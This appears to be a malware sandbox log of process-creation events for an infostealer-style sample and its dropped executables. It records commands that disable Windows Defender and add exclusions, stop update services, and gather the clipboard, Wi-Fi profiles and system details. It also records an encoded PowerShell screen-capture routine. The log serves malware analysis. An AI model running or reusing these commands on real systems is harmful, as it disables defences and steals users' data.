Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: unknown	Process created: C:\Windows\Logs\SettingSync\cmd.exe C:\Windows\Logs\SettingSync\cmd.exe
Source: unknown	Process created: C:\Windows\Logs\SettingSync\cmd.exe C:\Windows\Logs\SettingSync\cmd.exe
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBF6.tmp" "c:\Users\user\AppData\Local\Temp\sirtu5ev\CSCD8A1CC3D1CE048959A397DAF8AF51474.TMP"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBDBB.tmp" "c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Users\user\Desktop\iqA8j9yGcd.exe "C:\Users\user\Desktop\iqA8j9yGcd.exe"	Jump to behavior
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe -pbeznogym
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\main.exe "C:\ProgramData\main.exe"
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\main.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ut1ljh4b\ut1ljh4b.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ntoifwit\ntoifwit.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB2CE.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkA